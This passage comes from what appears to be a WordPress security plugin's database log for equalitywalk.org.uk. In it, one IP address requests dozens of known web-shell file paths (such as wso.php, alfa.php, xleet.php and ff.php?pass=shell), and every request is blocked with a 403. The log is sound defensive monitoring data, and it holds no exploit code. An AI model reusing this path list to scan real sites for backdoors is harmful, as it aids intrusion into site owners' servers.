Safari\\/537.36\"}','vf8WtSi6kd5QM4uD1G2Vx3Bc',0,1673949586.0135,155,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','5Kg9hZvGy2mJsVNeLTBuMljr',0,1673949621.8379,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','OecdVj1LhKrS9G3NyuWYpP4X',0,1673949622.2608,114,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','ahkT20e84zypbogc7UlXKHLV',0,1673949622.3711,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','04j7MDdI689QHF2OPixJnXct',0,1673949622.6166,113,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/5.php','','{\"1\":\"python-requests\\/2.28.1\"}','1lyga82eO74kxDjd5qIhciup',0,1673949622.6770,109,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3MAkvbUrx5BsfhDTIgac0m1u',0,1673949622.8246,101,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mDWbN3aUAGBgVi87vI2M1K5w',0,1673949623.0131,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VswKMCjBTtSmaiI43L5O1bNE',0,1673949623.9091,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/991176.php','','{\"1\":\"python-requests\\/2.28.1\"}','Dr7Ld0c4Awv35mHuYoTECje2',0,1673949631.9964,176,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qTn9U5NcQKwefdRSsCj7lPp6',0,1673949632.4850,134,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/f.php','','{\"1\":\"python-requests\\/2.28.1\"}','XYbMWzrNaw9HpsCFf0iuGmjV',0,1673949647.0839,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tGm7u1cgVkerDzB423QJvn8w',0,1673949649.7730,136,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','wGhbfdMgWUv58KImFRr1sLx2',0,1673949665.2053,132,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','XhclCFH2408SfnyMtYPQ7gkq',0,1673949665.7649,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','iPTm59kKBoslMwS1jVEYpy2O',0,1673949681.1461,318,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jQ48fghT12maZKABXUOsbroW',0,1673949681.8873,154,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"python-requests\\/2.28.1\"}','EMndeWHzsjDQYx8omBX5fCrS',0,1673949689.5909,278,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/swm.php','','{\"1\":\"python-requests\\/2.28.1\"}','atpyljYUErL5gCfK82BqNnmu',0,1673949689.6362,281,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','GsSK3VFi86InBNogrc0aDM7j',0,1673949689.6316,317,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','0hUlS7eFsEtyDTLfI2ncwkiM',0,1673949689.7109,275,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','7kdVC9Dj3BFIrNt2L1mGWsPp',0,1673949689.8298,218,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xltavrat.php','','{\"1\":\"python-requests\\/2.28.1\"}','WOsq4Rz8KLbAiegwtyFZ5V2Y',0,1673949689.7240,355,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','cBI0syX7Sx3MbWmr2iudDAFv',0,1673949689.8702,263,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','prmP6XeZ3W9fsI2MngKEOyJv',0,1673949689.6873,456,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','MongNmPIkqzbwfc8eJATd5tH',0,1673949689.7271,416,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/h.php','','{\"1\":\"python-requests\\/2.28.1\"}','LvBWzYMgxSN39jDhKJ6pydqt',0,1673949689.9318,257,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','LQDXlzs1k9fbMZEGpi2qYxIN',0,1673949689.7445,444,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','gyZrG5Y2xUJawPE3oKViuADk',0,1673949689.8951,294,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','FQ7uonJYT4x6ZejVhMkfR92G',0,1673949689.8550,337,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ok.php','','{\"1\":\"python-requests\\/2.28.1\"}','O6RbduQKPZsYLAynVqrSGUE1',0,1673949689.9614,266,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','swv6dKl7LjRrbhCcJNHk0DMn',0,1673949690.0614,188,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','tkE5YzmISLAvNWwg6UFrs1lB',0,1673949690.0003,270,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','E1neZzasTPfYN3MUCk9wHi50',0,1673949690.4411,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','FNiwKVxmrUDLsTC2fvIJWX1G',0,1673949690.4835,146,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','AYt0TCmW3OUDziZJaFukIweX',0,1673949690.5871,169,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2FjYDWoyntiaPq6C8wZT7JNu',0,1673949690.5749,182,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RlCYdWN4fmPTiHUrOaZE5uK3',0,1673949690.6862,141,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','myLKFNdIwsAXR8vOP7VjMWY2',0,1673949690.7447,116,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zLStcUgjhbTY2vixr7M0dXZH',0,1673949690.7477,143,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ybcAW3DJ0M9rCFUm7TKqh1OY',0,1673949690.7789,131,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ORzSGgXkxIEc7Pqj2hH6Aemd',0,1673949690.8241,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cFTwh3AynS2PVm7YJXMbrsgq',0,1673949690.8501,152,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LlYEvyzX0CrnIhOFf3MRDjAH',0,1673949690.9985,193,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JUHjqEhtTlQmuDGBsO9ba03i',0,1673949691.0460,145,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','m0T3hWHuN4rGcA7s18QJKnU5',0,1673949690.9991,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','HJUp6md4Ru5Dozcxf0kMBgY8',0,1673949691.0626,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','wZb0AKv3dW2BHTzEkUgmXoCJ',0,1673949691.0944,172,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/.tmb/cache/shz.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kJC1gjVHNbhITdxpUiLsrqmc',0,1673949691.1542,123,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/l.php','','{\"1\":\"python-requests\\/2.28.1\"}','14CjNEt3FQhS0RGgavOlPmY8',0,1673949694.6428,101,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','DIHO7MhPxBqgNylSoR8s9XwV',0,1673949695.2656,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','pRDfZtOCLxz3v7Wh4olwnIP0',0,1673949699.0934,158,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YNB0ixZ9f3VCT4qezOmQWyAU',0,1673949699.7373,173,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mari.php','','{\"1\":\"python-requests\\/2.28.1\"}','4hP8U7ajomqufKXWnJdbiMGH',0,1673949717.0098,149,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LwHt31bWjG9KYdqIMlBDao8O',0,1673949719.7451,100,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','QGcHdNlzW7yXgIPt1JbSir5v',0,1673949745.6230,117,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0NOu5Gemdskx6zLao1wIiqPC',0,1673949746.1345,100,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.28.1\"}','pAbMkW2BVmUoqRNTK8i90urC',0,1673949755.8064,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nFkrQtVuJd0R4miATEXHS97a',0,1673949756.1951,181,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/defau1t.php','','{\"1\":\"python-requests\\/2.28.1\"}','ohn7uX1BqCmlPVRDLIJvxdET',0,1673949771.0614,129,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','W4Xk6iJq7GEjStOgs9RDaoYd',0,1673949771.2488,118,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','5mIRJPDisx8pUduaWyXGrnfB',0,1673949771.3432,180,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Xfr1bHKWLm4k0DZvpQTPMqSI',0,1673949771.8030,100,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','T76WB4UxdEq0MXsoYeQciRwA',0,1673949772.3555,93,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','UIpf3iLc8eHa4Vg7PRNm5Jt2',0,1673949772.5517,109,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','EXBFIHh5qDMwdNlWO7VyPQ9i',0,1673949824.3814,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','idKm1gLfV3pFq8RQnaYM5c9C',0,1673949824.7682,133,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','XunsMHzf0tohmV8yERajeNKF',0,1673949861.5294,98,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xCjNR7PutOveVslDiAyYFJbq',0,1673949862.1181,337,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','B46aETcHdeqt1k2ujLNngrWf',0,1673949903.4722,120,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZU6vRAOa2BG1Fkdx0Qy8NHzS',0,1673949906.8755,90,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','sLyRTvHYAnDaOeVUNEmP6Zpi',0,1673949910.9863,138,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/jindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','7n9OBrhcluDgiPpZaXLjvT5I',0,1673949911.0691,116,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','OryC5DugQ8csdUlIm1zpGWPT',0,1673949911.1113,105,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','b4uHwfir9ERhXkFBY5S3PZoq',0,1673949911.6875,120,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','k4rsUCX0OtNcJ9jPol6vAwby',0,1673949911.6894,141,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','XCqHUgrGAkFoz4l03up6jZ7E',0,1673949911.8762,119,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','oumUJs1yhQqXcOVfx0pBGTzv',0,1673949916.3033,168,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','q02dGYEmO1jeg8IpMNlCXih3',0,1673949916.7199,199,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','S6buFeogY1xn4ZN05vOyVTLi',0,1673949917.2104,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8PNXKbRG72QueoswF0h5jOml',0,1673949917.5655,215,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','HtLhksK9GCZEpVrUWw8I5MNu',0,1673949917.7827,172,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','IH1T9fMwCSp3P0QLOU2gonyz',0,1673949917.8947,149,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PVivrTAMoKeb8EgFd6Z5NcjX',0,1673949917.9763,176,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kd3EGrl8vO1DA4NbVcQMXU79',0,1673949918.2590,507,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.28.1\"}','7qhpc4ZvNPGIWOlsLFfAYtEi',0,1673949925.2217,475,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','s6Wo0fbFLVOEZYlpiDNr7AJG',0,1673949926.4383,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','JCwfpDV1UTR0WLnesa6KE2S9',0,1673949941.9421,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"python-requests\\/2.28.1\"}','s1g4yWJnHNc0BtEae7Qrh6Gz',0,1673949942.2701,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','OKBSWx8cNbDf1jzhMyRtEXis',0,1673949942.3913,94,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','Ten2P6ySZcd08HaQiLKlE9IV',0,1673949942.7507,94,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QJRiKXqENbjIxhF2T3W79DtP',0,1673949942.9717,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','NAEjFc3gDKQfx4WkmpvyU8n6',0,1673949942.9776,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/4price.php','','{\"1\":\"python-requests\\/2.28.1\"}','OEQxDXshqF8NkMdz2WLUVgcb',0,1673949943.0445,134,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','Jma2BN4f8t1LKn6Vos5lzHhE',0,1673949943.0663,122,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','FvEVU65Qg93SsOpIKelGY4NZ',0,1673949943.2433,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/license.php','','{\"1\":\"python-requests\\/2.28.1\"}','cH5vk3GlZPEV6DiUFS8QdLog',0,1673949943.2957,116,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','BvhEYoka314UrbsgWcuSICzG',0,1673949943.3147,110,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','d0S54AsQGluXvyFa7qVh2YjL',0,1673949943.3166,113,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Jz85rdpDyTAHZ97NCjaPELW2',0,1673949943.3639,123,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso1.php','','{\"1\":\"python-requests\\/2.28.1\"}','pAs0XUgbaJyZfFOxBRD5VW3e',0,1673949943.4096,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like 